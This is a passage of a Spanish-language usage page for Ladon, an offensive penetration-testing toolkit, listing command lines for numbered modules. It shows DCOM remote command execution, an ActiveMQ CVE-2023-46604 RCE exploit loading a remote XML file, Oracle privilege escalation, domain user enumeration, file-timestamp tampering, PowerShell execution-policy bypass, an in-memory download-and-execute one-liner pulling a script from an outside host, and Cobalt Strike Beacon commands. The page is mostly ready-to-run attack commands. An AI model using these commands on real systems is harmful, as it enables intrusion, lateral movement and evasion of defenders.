##### 249 SharpSphere interactúa con el sistema operativo invitado de las máquinas virtuales gestionadas por vCenter y ejecuta comandos.```Bash	
Ladon SharpSphere

  No verb selected.

  dump        Snapshot and download memory dump file

  list        List all VMs managed by this vCenter

  execute     Execute given command in target VM

  c2          Run C2 using C3's VMwareShareFile module

  upload      Upload file to target VM

  download    Download file from target VM

  help        Display more information on a specific command.

  version     Display version information.
250 Ejecución remota de comandos Dcom a través de MMC20```Bash

Ladon MmcExec host cmdline Ladon MmcExec 127.0.0.1 calc Ladon MmcExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 251 Ejecución remota de comandos Dcom ShellWindows```Bash	
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
252 Dcom ejecución remota de comandos ShellBrowserWindow```Bash

Ladon ShellBrowserExec host cmdline Ladon ShellBrowserExec 127.0.0.1 calc Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 253 Información del sistema de detección Smtp Ntlm (puertos 25, 465, 587)```Bash	
Ladon 192.168.1.8/24 SmtpInfo
254 HTTP/S Información del sistema de detección Ntlm```Bash

Ladon 192.168.1.8/24 HttpInfo

root@kitploit:~
##### 255 ActiveMQ CVE-2023-46604 RCE Exploit```Bash	
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
256 DomainLog DomainUserIP Consulta remota de IP de usuario de dominio```Bash
root@kitploit:~
   Ladon DomainLog -d 7
   Ladon DomainLog -h ip -d 7
   Ladon DomainLog -h ip -d 7 -grep user
   Ladon DomainLog -h ip -u username -p password -d 7
   Ladon DomainLog -h ip -u username -p password -d 7 -all
   Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res

ult.txt

root@kitploit:~
##### 257 Detectar si el usuario es administrador de Lotus```Bash	
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
258 Servidor HTA Inicio con un clic También se puede ejecutar HTA al acceder a DOC```Bash

Ladon HtaSer Ladon HtaSer 8080

root@kitploit:~
##### 259 ConfVer ConfluenceVer detecta la versión de Confluence```Bash	
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
260 FindAD se puede usar para encontrar la ubicación de inicio de sesión de usuarios de Active Directory, enumerar usuarios del dominio```Bash

Ladon FindAD Ladon pveFindADUser

root@kitploit:~
##### 261 Herramienta de elevación de privilegios remota de Oracle Database controlador oficial>=.net 4.8```Bash	
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
262 Herramienta de escalada remota de privilegios de Oracle Database - 3 métodos de escalada con un clic```Bash

Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami

root@kitploit:~
##### BuildCS compilación dinámica de archivos de código C#```Bash	
Ladon BuildCS exe.cs exe
Ladon BuildCS dll.cs dll
Ladon BuildCS exe.cs dat
Modificar hora del archivo Especificar hora del archivo

Usage: Ladon UpdateFileTime <file_path> ```Bash Ladon UpdateFileTime E:\Ladon911\Ladon.exe "2024-09-11 09:11:00"

root@kitploit:~
##### Modificar la hora del archivo Copiar la hora del archivo```Bash
Ladon CopyFileTime E:\Ladon911\LadonExp.exe E:\Ladon911\Ladon.exe

PowerShell版本 Ladon.ps1

0x001 Cmd交互执行```Bash

powershell Import-Module .\Ladon.ps1 Ladon OnlinePC

root@kitploit:~
#### 0x002 Ejecución local no interactiva```Bash	
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass Import-Module .\Ladon.ps1;Ladon whoami

0x003 Carga y ejecución remota en memoria```Bash

powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"

root@kitploit:~
#### 0x004 Bypass de la política predeterminada de PowerShell```Bash	
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC

0x005 Escaneo de puertos personalizado```Bash

powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
### Cobalt Strike  Ladon.ps1

CS Beacon detecta hosts activos```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon ICMP
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon NbtInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon SmbInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon LdapInfo

CS Beacon 自定义端口扫描```bash shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
Detección de vulnerabilidad MS17010 en CS Beacon```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010

=======================================================

Ejemplo

http://k8gege.org/Ladon/example-en.html

Última versión

Última versión en sello pequeño: http://k8gege.org/Ladon/update.txt

Observadores a lo largo del tiempo

Observadores a lo largo del tiempo

Descargar herramienta